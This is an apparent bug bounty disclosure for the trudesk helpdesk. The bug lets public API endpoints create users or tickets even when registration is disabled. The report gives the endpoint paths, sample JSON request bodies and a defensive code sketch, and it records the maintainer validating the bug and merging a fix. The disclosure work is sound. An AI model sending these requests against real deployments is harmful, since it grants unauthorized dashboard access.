Register users in spite of Allow User Registration disabled in polonel/trudesk

Valid

Reported on

May 12th 2022


Description

An attacker can register a user even though Allow User Registration is disabled by default.

Proof of Concept

  1. Go to /captcha and get the captcha value and cookie.
  2. Send a POST request to /api/v1/public/account/create with the captcha value and cookie from step 1.

    // POST HOST/api/v1/public/account/create
    {
        "user": {
            "fullname": "uname",
            "email": "test@gmail.com",
            "password": "passwd"
        },
        "captcha": "captcha"
    }

  3. Registration succeeds.

Note

The same PoC works with the Create New Ticket endpoint (/api/v1/public/tickets/create):

{"user":{"fullname":"tpa tpa2","email":"test@gmail.com"},"ticket":{"subject":"123","issue":"123"},"captcha":"Dazr"}

Impact

An attacker can register a user and get inside the dashboard.
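
The missing server-side check, sketched as an added example (not part of the original report and not trudesk's code or its fix): a captcha-only handler beside a wrapper that refuses the request when the feature setting is off. All names here (settings, requireSetting, allowPublicTickets and the handlers) are hypothetical, and it is an assumption that the ticket endpoint has its own setting.

```javascript
// Hypothetical in-memory settings; both public features are off.
const settings = { allowUserRegistration: false, allowPublicTickets: false };

// The captcha text issued via /captcha is assumed to be kept in the session.
function captchaOk(session, body) {
  return typeof session.captcha === 'string' && body.captcha === session.captcha;
}

// Behaviour described in the report: a valid captcha is the only gate.
function createAccountCaptchaOnly(session, body, users) {
  if (!captchaOk(session, body)) return { status: 400, error: 'Invalid captcha' };
  users.push(body.user.email);
  return { status: 200 };
}

// Same idea for the public ticket endpoint mentioned in the Note.
function createTicketCaptchaOnly(session, body, tickets) {
  if (!captchaOk(session, body)) return { status: 400, error: 'Invalid captcha' };
  tickets.push(body.ticket.subject);
  return { status: 200 };
}

// Hardened form: the setting is checked on the server before the handler runs,
// so hiding the sign-up form in the UI is not the only control.
function requireSetting(name, handler) {
  return (session, body, store) => {
    if (settings[name] !== true) return { status: 403, error: 'Feature disabled' };
    return handler(session, body, store);
  };
}

const createAccount = requireSetting('allowUserRegistration', createAccountCaptchaOnly);
const createPublicTicket = requireSetting('allowPublicTickets', createTicketCaptchaOnly);

// Constructed sample request, mirroring the body shown in the report.
const sampleSession = { captcha: 'Dazr' };
const sampleBody = {
  user: { fullname: 'uname', email: 'test@gmail.com', password: 'passwd' },
  captcha: 'Dazr',
};
console.log('captcha-only:', createAccountCaptchaOnly(sampleSession, sampleBody, []).status);
console.log('gated:', createAccount(sampleSession, sampleBody, []).status);
```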

We are processing your report and will contact the polonel/trudesk team within 24 hours. a month ago
tienpa99 modified the report
a month ago
We have contacted a member of the polonel/trudesk team and are waiting to hear back a month ago
Chris Brame
a month ago

Maintainer


Can you try the same request once you log out of the app as yourself? It's using your permissions since you're logged in.

Chris Brame
a month ago

Maintainer


Actually, I see the issue. I will publish a fix soon.

Chris Brame validated this vulnerability a month ago
tienpa99 has been awarded the disclosure bounty
We have sent a fix follow up to the polonel/trudesk team. We will try again in 7 days. a month ago
Chris Brame confirmed that a fix has been merged on 49befa a month ago
Chris Brame has been awarded the fix bounty
tienpa99
a month ago

Researcher


Confirm the bug has been fixed.
